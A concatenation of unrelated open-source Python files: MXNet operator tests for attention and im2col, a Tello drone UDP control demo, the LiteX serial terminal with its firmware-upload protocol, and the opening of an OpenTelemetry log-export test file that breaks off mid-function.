q = mx.sym.transpose(q, axes=(1, 0, 2))
q_proj = mx.sym.FullyConnected(q, weight=q_weight, bias=q_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
att_score = mx.sym.contrib.interleaved_matmul_encdec_qk(
q_proj, kv_proj, heads=num_heads)
att_score = att_score + sonde
weighted_value = mx.sym.contrib.interleaved_matmul_encdec_valatt(
kv_proj, att_score, heads=num_heads)
output = mx.sym.FullyConnected(weighted_value, weight=out_weight, bias=out_bias, flatten=False,
num_hidden=out_dim, no_bias=False)
output = mx.sym.transpose(output, axes=(1, 0, 2))
output = mx.sym.Group([output, att_score])
executor = output.simple_bind(ctx=default_context(),
q=(batch_size, qkv_length, qkv_dim),
kv=(batch_size, qkv_length, qkv_dim),
q_weight=(qkv_units, qkv_dim),
q_bias=(qkv_units,),
k_weight=(qkv_units, qkv_dim),
k_bias=(qkv_units,),
v_weight=(qkv_units, qkv_dim),
v_bias=(qkv_units,),
out_weight=(out_dim, qkv_units),
out_bias=(out_dim,),
type_dict={'q': dtype,
'kv': dtype,
'q_weight': dtype,
'q_bias': dtype,
'k_weight': dtype,
'k_bias': dtype,
'v_weight': dtype,
'v_bias': dtype,
'out_weight': dtype,
'out_bias': dtype,
},
grad_req='write', force_rebind=True)
output_shape = executor.outputs[0].shape
output_grads = np.random.rand(*output_shape).astype(dtype) * 0.1
executor.copy_params_from(arg_params, {})
executor.arg_dict['sonde'][:] = 0.
executor.arg_dict['sonde'].wait_to_read()
executor.forward(is_train=True)
output_opti = executor.outputs[0].asnumpy()
att_score_opti = executor.outputs[1].asnumpy()
executor.backward([mx.nd.array(output_grads, dtype=dtype), mx.nd.zeros(att_score_opti.shape, dtype=dtype)])
grads_opti = {k: v.asnumpy() for k, v in executor.grad_dict.items()}
q = mx.sym.Variable('q')
kv = mx.sym.Variable('kv')
sonde = mx.sym.Variable('sonde')
q_weight = mx.sym.Variable('q_weight')
k_weight = mx.sym.Variable('k_weight')
v_weight = mx.sym.Variable('v_weight')
q_bias = mx.sym.Variable('q_bias')
k_bias = mx.sym.Variable('k_bias')
v_bias = mx.sym.Variable('v_bias')
out_weight = mx.sym.Variable('out_weight')
out_bias = mx.sym.Variable('out_bias')
q = mx.sym.FullyConnected(q, weight=q_weight, bias=q_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
k = mx.sym.FullyConnected(kv, weight=k_weight, bias=k_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
v = mx.sym.FullyConnected(kv, weight=v_weight, bias=v_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
q = mx.sym.reshape(q, shape=(0, 0, num_heads, -1))
q = mx.sym.transpose(q, axes=(0, 2, 1, 3))
q = mx.sym.reshape(q, shape=(-1, 0, 0), reverse=True)
k = mx.sym.reshape(k, shape=(0, 0, num_heads, -1))
k = mx.sym.transpose(k, axes=(0, 2, 1, 3))
k = mx.sym.reshape(k, shape=(-1, 0, 0), reverse=True)
q = mx.sym.contrib.div_sqrt_dim(q)
att_score = mx.sym.batch_dot(q, k, transpose_b=True)
att_score = att_score + sonde
v = mx.sym.reshape(v, shape=(0, 0, num_heads, -1))
v = mx.sym.transpose(v, axes=(0, 2, 1, 3))
v = mx.sym.reshape(v, shape=(-1, 0, 0), reverse=True)
weighted_value = mx.sym.batch_dot(att_score, v)
weighted_value = mx.sym.reshape(weighted_value, shape=(-1, num_heads, 0, 0),
reverse=True)
weighted_value = mx.sym.transpose(weighted_value, axes=(0, 2, 1, 3))
weighted_value = mx.sym.reshape(weighted_value, shape=(0, 0, -1))
output = mx.sym.FullyConnected(weighted_value, weight=out_weight, bias=out_bias, flatten=False,
num_hidden=out_dim, no_bias=False)
output = mx.sym.Group([output, att_score])
executor = output.simple_bind(ctx=default_context(),
q=(batch_size, qkv_length, qkv_dim),
kv=(batch_size, qkv_length, qkv_dim),
type_dict={'q': dtype,
'kv': dtype},
grad_req='write', force_rebind=True)
executor.copy_params_from(arg_params, {})
executor.arg_dict['sonde'][:] = 0.
executor.arg_dict['sonde'].wait_to_read()
executor.forward(is_train=True)
output_orig = executor.outputs[0].asnumpy()
att_score_orig = executor.outputs[1].asnumpy()
executor.backward([mx.nd.array(output_grads, dtype=dtype), mx.nd.zeros(att_score_orig.shape, dtype=dtype)])
grads_orig = {k : v.asnumpy() for k, v in executor.grad_dict.items()}
assert_allclose(att_score_orig, att_score_opti, rtol=1e-2, atol=1e-3)
assert_allclose(output_orig, output_opti, rtol=1e-2, atol=1e-3)
for k in grads_opti.keys():
assert(grads_orig[k].dtype == grads_opti[k].dtype)
assert(grads_orig[k].shape == grads_opti[k].shape)
assert_allclose(grads_orig[k], grads_opti[k], rtol=1e-2, atol=1e-3)
@with_seed()
@assert_raises_cuda_not_satisfied(min_version='9.1')
def test_multihead_attention_encdec():
dtypes = ['float32']
if default_context().device_type == 'gpu':
dtypes += ['float16']
for dtype in dtypes:
check_multihead_attention_encdec(dtype=dtype)
@with_seed()
def test_im2col_col2im():
def compute_output_size(spatial, kernel, stride=1, dilate=1, pad=0):
pad_size = spatial + 2 * pad
dilated_kernel = dilate * (kernel - 1) + 1
return (pad_size - dilated_kernel) // stride + 1
def build_kwargs(kernel, stride=1, dilate=1, pad=0):
return {'kernel': (kernel, kernel),
'stride': (stride, stride),
'dilate': (dilate, dilate),
'pad': (pad, pad)}
# use im2col to compute convolution
def test_conv_compute(input_shape, num_filter, kernel, stride=1, dilate=1, pad=0):
batch_size = input_shape[0]
channel = input_shape[1]
kwargs = build_kwargs(kernel, stride, dilate, pad)
data = mx.nd.uniform(shape=input_shape)
col = mx.nd.im2col(data, **kwargs)
w = mx.nd.uniform(shape=(num_filter, channel, kernel, kernel))
c1 = mx.nd.dot(col.transpose((0, 2, 1)), w.reshape(num_filter, -1).T).transpose((0, 2, 1))
hos = compute_output_size(input_shape[2], kernel, stride, dilate, pad)
wos = compute_output_size(input_shape[3], kernel, stride, dilate, pad)
c1 = c1.reshape((batch_size, num_filter, hos, wos))
c2 = mx.nd.Convolution(data, num_filter=num_filter, weight=w, no_bias=True, **kwargs)
assert_almost_equal(c1.asnumpy(), c2.asnumpy(), rtol=1e-5, atol=1e-5)
test_conv_compute(
input_shape = (5, 3, 30, 20),
num_filter = 10,
kernel = 3
)
test_conv_compute(
input_shape = (5, 3, 30, 20),
num_filter = 10,
kernel = 3,
stride = 2
)
test_conv_compute(
input_shape = (5, 3, 30, 20),
num_filter = 10,
kernel = 3,
stride = 2,
dilate = 2
)
test_conv_compute(
input_shape = (5, 3, 30, 20),
num_filter = 10,
kernel = 3,
stride = 2,
dilate = 2,
pad = 1
)
# use composite of im2col and col2im to reconstruct image
def test_reconstruct(input_shape, kernel, stride=1, dilate=1, pad=0):
batch_size = input_shape[0]
channel = input_shape[1]
kwargs = build_kwargs(kernel, stride, dilate, pad)
data = mx.nd.uniform(shape=input_shape)
col = mx.nd.im2col(data, **kwargs)
im1 = mx.nd.col2im(col, input_shape[2:], **kwargs)
im2 = mx.nd.col2im(mx.nd.ones_like(col), input_shape[2:], **kwargs) * data
assert_almost_equal(im1.asnumpy(), im2.asnumpy(), rtol=1e-5, atol=1e-5)
test_reconstruct(
input_shape = (5, 3, 30, 20),
kernel = 3
)
test_reconstruct(
input_shape = (5, 3, 30, 20),
kernel = 3,
stride = 2
)
test_reconstruct(
input_shape = (5, 3, 30, 20),
kernel = 3,
stride = 2,
dilate = 2
)
test_reconstruct(
input_shape = (5, 3, 30, 20),
kernel = 3,
stride = 2,
dilate = 2,
pad = 1
)
# test gradient
# the grad of im2col is col2im, and vice versa
def test_grad(input_shape, kernel, stride=1, dilate=1, pad=0):
# im2col
data = mx.sym.Variable('data')
kwargs = build_kwargs(kernel, stride, dilate, pad)
sym = mx.sym.im2col(data, **kwargs)
im = mx.nd.uniform(shape=input_shape)
col = mx.nd.im2col(im, **kwargs)
col_shape = col.shape
expected = mx.nd.col2im(col, input_shape[2:], **kwargs)
check_symbolic_backward(sym, [im.asnumpy()], [col.asnumpy()], [expected.asnumpy()])
# col2im
data = mx.sym.Variable('data')
sym = mx.sym.col2im(data, input_shape[2:], **kwargs)
col = mx.nd.uniform(shape=col_shape)
im = mx.nd.col2im(col, input_shape[2:], **kwargs)
expected = mx.nd.im2col(im, **kwargs)
check_symbolic_backward(sym, [col.asnumpy()], [im.asnumpy()], [expected.asnumpy()])
test_grad(
input_shape = (5, 3, 30, 20),
kernel = 3
)
test_grad(
input_shape = (5, 3, 30, 20),
kernel = 3,
stride = 2
)
test_grad(
input_shape = (5, 3, 30, 20),
kernel = 3,
stride = 2,
dilate = 2
)
test_grad(
input_shape = (5, 3, 30, 20),
kernel = 3,
stride = 2,
dilate = 2,
pad = 1
)
if __name__ == '__main__':
import nose
nose.runmodule()
|
tello_commands.py | #
# Tello Python3 Control Demo
#
# http://www.ryzerobotics.com/
#
# 1/1/2018
#
# ** Original Ryze SDK file to issue commands to the drone. Not a dependency
import threading
import socket
import sys
import time
import platform
host = ''
port = 9000
locaddr = (host,port)
# Create a UDP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
tello_address = ('192.168.10.1', 8889)
sock.bind(locaddr)
def recv():
count = 0
while True:
try:
data, server = sock.recvfrom(1518)
print(data.decode(encoding="utf-8"))
except Exception:
print ('\nExit . . .\n')
break
print ('\r\n\r\nTello Python3 Demo.\r\n')
print ('Tello: command takeoff land flip forward back left right \r\n up down cw ccw speed speed?\r\n')
print ('end -- quit demo.\r\n')
#recvThread create
recvThread = threading.Thread(target=recv)
recvThread.start()
while True:
try:
python_version = str(platform.python_version())
version_init_num = int(python_version.partition('.')[0])
# print (version_init_num)
if version_init_num == 3:
msg = input("");
elif version_init_num == 2:
msg = raw_input("");
if not msg:
break
if 'end' in msg:
print ('...')
sock.close()
break
# Send data
msg = msg.encode(encoding="utf-8")
sent = sock.sendto(msg, tello_address)
except KeyboardInterrupt:
print ('\n . . .\n')
sock.close()
break
|
litex_term.py | #!/usr/bin/env python3
#
# This file is part of LiteX.
#
# Copyright (c) 2015-2020 Florent Kermarrec <florent@enjoy-digital.fr>
# Copyright (c) 2015 Sebastien Bourdeauducq <sb@m-labs.hk>
# Copyright (c) 2016 whitequark <whitequark@whitequark.org>
# SPDX-License-Identifier: BSD-2-Clause
import sys
import signal
import os
import time
import serial
import threading
import multiprocessing
import argparse
import json
import socket
# Console ------------------------------------------------------------------------------------------
if sys.platform == "win32":
import ctypes
import msvcrt
class Console:
def configure(self):
# https://stackoverflow.com/a/36760881
# ENABLE_VIRTUAL_TERMINAL_PROCESSING
kernel32 = ctypes.windll.kernel32
kernel32.SetConsoleMode(kernel32.GetStdHandle(-11), 7)
def unconfigure(self):
pass
def getkey(self):
return msvcrt.getch()
# getch doesn't return Virtual Keycodes, but rather
# PS/2 Scan Codes. Keycodes starting with 0xE0 are
# worth handling.
def escape_char(self, b):
return b == b"\xe0"
def handle_escape(self, b):
return {
b"H" : b"\x1b[A", # Up
b"P" : b"\x1b[B", # Down
b"K" : b"\x1b[D", # Left
b"M" : b"\x1b[C", # Right
b"G" : b"\x1b[H", # Home
b"O" : b"\x1b[F", # End
b"R" : b"\x1b[2~", # Insert
b"S" : b"\x1b[3~", # Delete
}.get(b, None) # TODO: Handle ESC? Others?
else:
import termios
import pty
class Console:
def __init__(self):
self.fd = sys.stdin.fileno()
self.default_settings = termios.tcgetattr(self.fd)
def configure(self):
settings = termios.tcgetattr(self.fd)
settings[3] = settings[3] & ~termios.ICANON & ~termios.ECHO
settings[6][termios.VMIN] = 1
settings[6][termios.VTIME] = 0
termios.tcsetattr(self.fd, termios.TCSANOW, settings)
def unconfigure(self):
termios.tcsetattr(self.fd, termios.TCSAFLUSH, self.default_settings)
def getkey(self):
return os.read(self.fd, 1)
def escape_char(self, b):
return False
def handle_escape(self, b):
return None
# Bridge UART -------------------------------------------------------------------------------------
from litex import RemoteClient
class BridgeUART:
def __init__(self, name="uart_xover", host="localhost", base_address=None, csr_csv=None):
self.bus = RemoteClient(host=host, base_address=base_address, csr_csv=csr_csv)
present = False
for k, v in self.bus.regs.d.items():
if f"{name}_" in k:
setattr(self, k.replace(f"{name}_", ""), v)
present = True
if not present:
raise ValueError(f"CrossoverUART {name} not present in design.")
# FIXME: On PCIe designs, CSR is remapped to 0 to limit BAR0 size.
if base_address is None and hasattr(self.bus.bases, "pcie_phy"):
self.bus.base_address = -self.bus.mems.csr.base
def open(self):
self.bus.open()
self.file, self.name = pty.openpty()
self.pty2crossover_thread = multiprocessing.Process(target=self.pty2crossover)
self.crossover2pty_thread = multiprocessing.Process(target=self.crossover2pty)
self.pty2crossover_thread.start()
self.crossover2pty_thread.start()
def close(self):
self.bus.close()
self.pty2crossover_thread.terminate()
self.crossover2pty_thread.terminate()
def pty2crossover(self):
while True:
r = os.read(self.file, 1)
self.rxtx.write(ord(r))
def crossover2pty(self):
while True:
if self.rxfull.read():
length = 16
elif not self.rxempty.read():
length = 1
else:
time.sleep(1e-3)
continue
r = self.bus.read(self.rxtx.addr, length=length, burst="fixed")
for v in r:
os.write(self.file, bytes(chr(v).encode("utf-8")))
# JTAG UART ----------------------------------------------------------------------------------------
from litex.build.openocd import OpenOCD
class JTAGUART:
def __init__(self, config="openocd_xc7_ft2232.cfg", port=20000, chain=1):
self.config = config
self.port = port
self.chain = chain
def open(self):
self.file, self.name = pty.openpty()
self.jtag2tcp_thread = multiprocessing.Process(target=self.jtag2tcp)
self.jtag2tcp_thread.start()
time.sleep(0.5)
self.pty2tcp_thread = multiprocessing.Process(target=self.pty2tcp)
self.tcp2pty_thread = multiprocessing.Process(target=self.tcp2pty)
self.tcp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.tcp.connect(("localhost", self.port))
self.pty2tcp_thread.start()
self.tcp2pty_thread.start()
def close(self):
self.jtag2tcp_thread.terminate()
self.pty2tcp_thread.terminate()
self.tcp2pty_thread.terminate()
def jtag2tcp(self):
prog = OpenOCD(self.config)
prog.stream(self.port, self.chain)
def pty2tcp(self):
while True:
r = os.read(self.file, 1)
self.tcp.send(r)
def tcp2pty(self):
while True:
r = self.tcp.recv(1)
os.write(self.file, bytes(r))
# Intel/Altera JTAG UART via nios2-terminal
class Nios2Terminal():
def __init__(self):
from subprocess import Popen, PIPE
p = Popen("nios2-terminal", stdin=PIPE, stdout=PIPE)
self.p = p
def read(self):
return self.p.stdout.read(1)
def in_waiting(self):
# unfortunately p.stdout does not provide
# information about awaiting input
return False
def write(self, data):
if data is not None:
self.p.stdin.write(data)
try:
self.p.stdin.flush()
except BrokenPipeError:
print("nios2-terminal has terminated, exiting...\n")
sys.exit(1)
def close(self):
self.p.terminate()
# SFL ----------------------------------------------------------------------------------------------
sfl_prompt_req = b"F7: boot from serial\n"
sfl_prompt_ack = b"\x06"
sfl_magic_req = b"sL5DdSMmkekro\n"
sfl_magic_ack = b"z6IHG7cYDID6o\n"
sfl_payload_length = 255
# General commands
sfl_cmd_abort = b"\x00"
sfl_cmd_load = b"\x01"
sfl_cmd_jump = b"\x02"
# Replies
sfl_ack_success = b"K"
sfl_ack_crcerror = b"C"
sfl_ack_unknown = b"U"
sfl_ack_error = b"E"
class SFLFrame:
def __init__(self):
self.cmd = bytes()
self.payload = bytes()
def compute_crc(self):
return crc16(self.cmd + self.payload)
def encode(self):
packet = bytes([len(self.payload)])
packet += self.compute_crc().to_bytes(2, "big")
packet += self.cmd
packet += self.payload
return packet
# CRC16 --------------------------------------------------------------------------------------------
crc16_table = [
0x0000, 0x1021, 0x2042, 0x3063, 0x4084, 0x50A5, 0x60C6, 0x70E7,
0x8108, 0x9129, 0xA14A, 0xB16B, 0xC18C, 0xD1AD, 0xE1CE, 0xF1EF,
0x1231, 0x0210, 0x3273, 0x2252, 0x52B5, 0x4294, 0x72F7, 0x62D6,
0x9339, 0x8318, 0xB37B, 0xA35A, 0xD3BD, 0xC39C, 0xF3FF, 0xE3DE,
0x2462, 0x3443, 0x0420, 0x1401, 0x64E6, 0x74C7, 0x44A4, 0x5485,
0xA56A, 0xB54B, 0x8528, 0x9509, 0xE5EE, 0xF5CF, 0xC5AC, 0xD58D,
0x3653, 0x2672, 0x1611, 0x0630, 0x76D7, 0x66F6, 0x5695, 0x46B4,
0xB75B, 0xA77A, 0x9719, 0x8738, 0xF7DF, 0xE7FE, 0xD79D, 0xC7BC,
0x48C4, 0x58E5, 0x6886, 0x78A7, 0x0840, 0x1861, 0x2802, 0x3823,
0xC9CC, 0xD9ED, 0xE98E, 0xF9AF, 0x8948, 0x9969, 0xA90A, 0xB92B,
0x5AF5, 0x4AD4, 0x7AB7, 0x6A96, 0x1A71, 0x0A50, 0x3A33, 0x2A12,
0xDBFD, 0xCBDC, 0xFBBF, 0xEB9E, 0x9B79, 0x8B58, 0xBB3B, 0xAB1A,
0x6CA6, 0x7C87, 0x4CE4, 0x5CC5, 0x2C22, 0x3C03, 0x0C60, 0x1C41,
0xEDAE, 0xFD8F, 0xCDEC, 0xDDCD, 0xAD2A, 0xBD0B, 0x8D68, 0x9D49,
0x7E97, 0x6EB6, 0x5ED5, 0x4EF4, 0x3E13, 0x2E32, 0x1E51, 0x0E70,
0xFF9F, 0xEFBE, 0xDFDD, 0xCFFC, 0xBF1B, 0xAF3A, 0x9F59, 0x8F78,
0x9188, 0x81A9, 0xB1CA, 0xA1EB, 0xD10C, 0xC12D, 0xF14E, 0xE16F,
0x1080, 0x00A1, 0x30C2, 0x20E3, 0x5004, 0x4025, 0x7046, 0x6067,
0x83B9, 0x9398, 0xA3FB, 0xB3DA, 0xC33D, 0xD31C, 0xE37F, 0xF35E,
0x02B1, 0x1290, 0x22F3, 0x32D2, 0x4235, 0x5214, 0x6277, 0x7256,
0xB5EA, 0xA5CB, 0x95A8, 0x8589, 0xF56E, 0xE54F, 0xD52C, 0xC50D,
0x34E2, 0x24C3, 0x14A0, 0x0481, 0x7466, 0x6447, 0x5424, 0x4405,
0xA7DB, 0xB7FA, 0x8799, 0x97B8, 0xE75F, 0xF77E, 0xC71D, 0xD73C,
0x26D3, 0x36F2, 0x0691, 0x16B0, 0x6657, 0x7676, 0x4615, 0x5634,
0xD94C, 0xC96D, 0xF90E, 0xE92F, 0x99C8, 0x89E9, 0xB98A, 0xA9AB,
0x5844, 0x4865, 0x7806, 0x6827, 0x18C0, 0x08E1, 0x3882, 0x28A3,
0xCB7D, 0xDB5C, 0xEB3F, 0xFB1E, 0x8BF9, 0x9BD8, 0xABBB, 0xBB9A,
0x4A75, 0x5A54, 0x6A37, 0x7A16, 0x0AF1, 0x1AD0, 0x2AB3, 0x3A92,
0xFD2E, 0xED0F, 0xDD6C, 0xCD4D, 0xBDAA, 0xAD8B, 0x9DE8, 0x8DC9,
0x7C26, 0x6C07, 0x5C64, 0x4C45, 0x3CA2, 0x2C83, 0x1CE0, 0x0CC1,
0xEF1F, 0xFF3E, 0xCF5D, 0xDF7C, 0xAF9B, 0xBFBA, 0x8FD9, 0x9FF8,
0x6E17, 0x7E36, 0x4E55, 0x5E74, 0x2E93, 0x3EB2, 0x0ED1, 0x1EF0
]
def crc16(l):
crc = 0
for d in l:
crc = crc16_table[((crc >> 8) ^ d) & 0xff] ^ (crc << 8)
return crc & 0xffff
# LiteXTerm ----------------------------------------------------------------------------------------
class LiteXTerm:
def __init__(self, serial_boot, kernel_image, kernel_address, json_images, safe):
self.serial_boot = serial_boot
assert not (kernel_image is not None and json_images is not None)
self.mem_regions = {}
if kernel_image is not None:
self.mem_regions = {kernel_image: kernel_address}
self.boot_address = kernel_address
if json_images is not None:
f = open(json_images, "r")
json_dir = os.path.dirname(json_images)
for k, v in json.load(f).items():
self.mem_regions[os.path.join(json_dir, k)] = v
self.boot_address = self.mem_regions[list(self.mem_regions.keys())[-1]]
f.close()
self.reader_alive = False
self.writer_alive = False
self.prompt_detect_buffer = bytes(len(sfl_prompt_req))
self.magic_detect_buffer = bytes(len(sfl_magic_req))
self.console = Console()
signal.signal(signal.SIGINT, self.sigint)
self.sigint_time_last = 0
self.safe = safe
self.delay = 0
self.length = 64
self.outstanding = 0 if safe else 128
def open(self, port, baudrate):
if hasattr(self, "port"):
return
self.port = serial.serial_for_url(port, baudrate)
def close(self):
if not hasattr(self, "port"):
return
self.port.close()
del self.port
def sigint(self, sig, frame):
if hasattr(self, "port"):
self.port.write(b"\x03")
sigint_time_current = time.time()
# Exit term if 2 CTRL-C pressed in less than 0.5s.
if (sigint_time_current - self.sigint_time_last < 0.5):
self.console.unconfigure()
self.close()
sys.exit()
else:
self.sigint_time_last = sigint_time_current
def send_frame(self, frame):
retry = 1
while retry:
self.port.write(frame.encode())
# Get the reply from the device
reply = self.port.read()
if reply == sfl_ack_success:
retry = 0
elif reply == sfl_ack_crcerror:
retry = 1
else:
print("[LXTERM] Got unknown reply '{}' from the device, aborting.".format(reply))
return 0
return 1
def receive_upload_response(self):
reply = self.port.read()
if reply == sfl_ack_success:
return True
elif reply == sfl_ack_crcerror:
print("[LXTERM] Upload to device failed due to data corruption (CRC error)")
else:
print(f"[LXTERM] Got unexpected response from device '{reply}'")
sys.exit(1)
def upload_calibration(self, address):
print("[LXTERM] Upload calibration... ", end="")
sys.stdout.flush()
# Calibration parameters.
min_delay = 1e-5
max_delay = 1e-3
nframes = 16
length_range = [64, 128, 250]
# Run calibration with increasing delay and decreasing length.
delay = min_delay
working_delay = None
working_length = None
while delay <= max_delay:
for length in length_range:
#p0rint(f"delay {delay}, length {length}")
# Prepare frame.
frame = SFLFrame()
frame.cmd = sfl_cmd_load
frame_data = bytearray(min(length, sfl_payload_length-4))
frame.payload = address.to_bytes(4, "big")
frame.payload += frame_data
frame = frame.encode()
# Send N consecutive frames.
for i in range(nframes):
self.port.write(frame)
time.sleep(delay)
# Wait and get acks.
working = True
time.sleep(0.2)
while self.port.in_waiting:
ack = self.port.read()
#print(ack)
if ack in [sfl_ack_error, sfl_ack_crcerror]:
working = False
if working:
# Save working delay/length and exit.
working_delay = delay
working_length = min(length, sfl_payload_length - 4)
break
# Exit if working delay found.
if (working_delay is not None):
break
# Else increase delay.
delay = delay*2
# Set parameters.
if (working_delay is not None):
print(f"(inter-frame: {working_delay*1e6:5.2f}us, length: {working_length})")
self.delay = working_delay
self.length = working_length
else:
print("failed, switching to --safe mode.")
self.delay = 0
self.length = 64
self.outstanding = 0
def upload(self, filename, address):
f = open(filename, "rb")
f.seek(0, 2)
length = f.tell()
f.seek(0, 0)
print(f"[LXTERM] Uploading {filename} to 0x{address:08x} ({length} bytes)...")
# Upload calibration
if not self.safe:
self.upload_calibration(address)
# Force safe mode settings when calibration fails.
if self.delay is None:
self.delay = 0
self.length = 64
self.outstanding = 0
# Prepare parameters
current_address = address
position = 0
start = time.time()
remaining = length
outstanding = 0
while remaining:
# Show progress
sys.stdout.write("|{}>{}| {}%\r".format(
"=" * (20*position//length),
" " * (20-20*position//length),
100*position//length))
sys.stdout.flush()
# Send frame if max outstanding not reached.
if outstanding <= self.outstanding:
# Prepare frame.
frame = SFLFrame()
frame.cmd = sfl_cmd_load
frame_data = f.read(min(remaining, self.length-4))
frame.payload = current_address.to_bytes(4, "big")
frame.payload += frame_data
# Encode frame and send it.
self.port.write(frame.encode())
# Update parameters
current_address += len(frame_data)
position += len(frame_data)
remaining -= len(frame_data)
outstanding += 1
# Inter-frame delay.
time.sleep(self.delay)
# Read response if available.
while self.port.in_waiting:
ack = self.receive_upload_response()
if ack:
outstanding -= 1
break
# Get remaining responses.
for _ in range(outstanding):
self.receive_upload_response()
# Compute speed.
end = time.time()
elapsed = end - start
print("[LXTERM] Upload complete ({0:.1f}KB/s).".format(length/(elapsed*1024)))
f.close()
return length
def boot(self):
print("[LXTERM] Booting the device.")
frame = SFLFrame()
frame.cmd = sfl_cmd_jump
frame.payload = int(self.boot_address, 16).to_bytes(4, "big")
self.send_frame(frame)
def detect_prompt(self, data):
if len(data):
self.prompt_detect_buffer = self.prompt_detect_buffer[1:] + data
return self.prompt_detect_buffer == sfl_prompt_req
else:
return False
def answer_prompt(self):
print("[LXTERM] Received serial boot prompt from the device.")
self.port.write(sfl_prompt_ack)
def detect_magic(self, data):
if len(data):
self.magic_detect_buffer = self.magic_detect_buffer[1:] + data
return self.magic_detect_buffer == sfl_magic_req
else:
return False
def answer_magic(self):
print("[LXTERM] Received firmware download request from the device.")
if(len(self.mem_regions)):
self.port.write(sfl_magic_ack)
for filename, base in self.mem_regions.items():
self.upload(filename, int(base, 16))
self.boot()
print("[LXTERM] Done.")
def reader(self):
try:
while self.reader_alive:
c = self.port.read()
sys.stdout.buffer.write(c)
sys.stdout.flush()
if len(self.mem_regions):
if self.serial_boot and self.detect_prompt(c):
self.answer_prompt()
if self.detect_magic(c):
self.answer_magic()
except serial.SerialException:
self.reader_alive = False
self.console.unconfigure()
raise
def start_reader(self):
self.reader_alive = True
self.reader_thread = threading.Thread(target=self.reader)
self.reader_thread.setDaemon(True)
self.reader_thread.start()
def stop_reader(self):
self.reader_alive = False
self.reader_thread.join()
def writer(self):
try:
while self.writer_alive:
b = self.console.getkey()
if b == b"\x03":
self.stop()
elif b == b"\n":
self.port.write(b"\x0a")
elif self.console.escape_char(b):
b = self.console.getkey()
ansi_seq = self.console.handle_escape(b)
self.port.write(ansi_seq)
else:
self.port.write(b)
except:
self.writer_alive = False
self.console.unconfigure()
raise
def start_writer(self):
self.writer_alive = True
self.writer_thread = threading.Thread(target=self.writer)
self.writer_thread.setDaemon(True)
self.writer_thread.start()
def stop_writer(self):
self.writer_alive = False
self.writer_thread.join()
def start(self):
self.start_reader()
self.start_writer()
def stop(self):
self.reader_alive = False
self.writer_alive = False
def join(self, writer_only=False):
self.writer_thread.join()
if not writer_only:
self.reader_thread.join()
# Run ----------------------------------------------------------------------------------------------
def _get_args():
parser = argparse.ArgumentParser()
parser.add_argument("port", help="Serial port (eg /dev/tty*, bridge, jtag)")
parser.add_argument("--speed", default=115200, help="Serial baudrate")
parser.add_argument("--serial-boot", default=False, action='store_true', help="Automatically initiate serial boot")
parser.add_argument("--kernel", default=None, help="Kernel image")
parser.add_argument("--kernel-adr", default="0x40000000", help="Kernel address")
parser.add_argument("--images", default=None, help="JSON description of the images to load to memory")
parser.add_argument("--safe", action="store_true", help="Safe serial boot mode, disable upload speed optimizations")
parser.add_argument("--csr-csv", default=None, help="SoC CSV file")
parser.add_argument("--base-address", default=None, help="CSR base address")
parser.add_argument("--bridge-name", default="uart_xover", help="Bridge UART name to use (present in design/csr.csv)")
parser.add_argument("--jtag-name", default="jtag_uart", help="JTAG UART type: jtag_uart (default), jtag_atlantic")
parser.add_argument("--jtag-config", default="openocd_xc7_ft2232.cfg", help="OpenOCD JTAG configuration file for jtag_uart")
parser.add_argument("--jtag-chain", default=1, help="JTAG chain.")
return parser.parse_args()
def main():
args = _get_args()
term = LiteXTerm(args.serial_boot, args.kernel, args.kernel_adr, args.images, args.safe)
if sys.platform == "win32":
if args.port in ["bridge", "jtag"]:
raise NotImplementedError
if args.port in ["bridge", "crossover"]: # FIXME: 2021-02-18, crossover for retro-compatibility remove and update targets?
base_address = None if args.base_address is None else int(args.base_address)
bridge = BridgeUART(base_address=base_address, csr_csv=args.csr_csv, name=args.bridge_name)
bridge.open()
port = os.ttyname(bridge.name)
elif args.port in ["jtag"]:
if args.jtag_name == "jtag_atlantic":
term.port = Nios2Terminal()
port = args.port
elif args.jtag_name == "jtag_uart":
bridge = JTAGUART(config=args.jtag_config, chain=int(args.jtag_chain))
bridge.open()
port = os.ttyname(bridge.name)
else:
raise NotImplementedError
else:
port = args.port
term.open(port, int(float(args.speed)))
term.console.configure()
term.start()
term.join(True)
if __name__ == "__main__":
main()
|
test_export.py | # Copyright The OpenTelemetry Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# pylint: disable=protected-access
import logging
import multiprocessing
import os
import sys
import time
import unittest
from concurrent.futures import ThreadPoolExecutor
from unittest.mock import Mock, patch
from opentelemetry.sdk import trace
from opentelemetry.sdk._logs import (
LogData,
LogEmitterProvider,
LogRecord,
OTLPHandler,
)
from opentelemetry.sdk._logs.export import (
BatchLogProcessor,
ConsoleLogExporter,
SimpleLogProcessor,
)
from opentelemetry.sdk._logs.export.in_memory_log_exporter import (
InMemoryLogExporter,
)
from opentelemetry.sdk._logs.severity import SeverityNumber
from opentelemetry.sdk.resources import Resource as SDKResource
from opentelemetry.sdk.util.instrumentation import InstrumentationInfo
from opentelemetry.test.concurrency_test import ConcurrencyTestBase
from opentelemetry.trace import TraceFlags
from opentelemetry.trace.span import INVALID_SPAN_CONTEXT
class TestSimpleLogProcessor(unittest.TestCase):
def test_simple_log_processor_default_level(self):
exporter = InMemoryLogExporter()
log_emitter_provider = LogEmitterProvider()
log_emitter = log_emitter_provider.get_log_emitter(__name__)
log_emitter_provider.add_log_processor(SimpleLogProcessor(exporter))
logger = logging.getLogger("default_level")
logger.addHandler(OTLPHandler(log_emitter=log_emitter))
logger.warning("Something is wrong")
finished_logs = exporter.get_finished_logs()
self.assertEqual(len(finished_logs), 1)
warning_log_record = finished_logs[0].log_record
self.assertEqual(warning_log_record.body, "Something is wrong")
self.assertEqual(warning_log_record.severity_text, "WARNING")
self.assertEqual(
warning_log_record.severity_number, SeverityNumber.WARN
)
def test_simple_log_processor_custom_level(self):
exporter = InMemoryLogExporter()
log_emitter_provider = LogEmitterProvider()
log_emitter = log_emitter_provider.get_log_emitter(__name__)
